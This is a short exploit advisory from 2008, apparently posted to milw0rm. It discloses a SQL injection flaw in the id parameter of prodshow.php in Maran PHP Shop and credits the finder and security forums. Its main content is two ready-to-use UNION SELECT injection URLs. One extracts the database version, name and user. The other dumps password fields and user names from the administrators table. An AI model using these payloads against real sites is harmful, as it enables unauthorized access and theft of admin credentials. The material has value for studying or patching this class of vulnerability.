[~]------------------------------------------------------------------------------------------------------------- [~] Maran PHP Shop (prodshow.php) SQL Injection Vulnerability [~] [~] http://www.maran.pamil-visions.com/maranshop.php [~] [~] [~] ------------------------------------------------------------------------------------------------------------ [~] Bug founded by d3v1l [Avram Marius] [~] [~] Date: 12.10.2008 [~] [~] [~] d3v1l@spoofer.com http://security-sh3ll.com [~] [~] ------------------------------------------------------------------------------------------------------------ [~] Greetz tO ALL:- [~] [~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) [~] [~] milw0rm staff [~]------------------------------------------------------------------------------------------------------------- [~] Exploit :- [~] [~] http://site.com/prodshow.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7 [~] [~] http://site.com/prodshow.php?id=1 UNION SELECT 1,concat(user_password,char(58),user_name),3,4,5,6,7 FROM administrators [~]---------------------------------------------------------------------------------------------------------------------- # milw0rm.com [2008-11-02]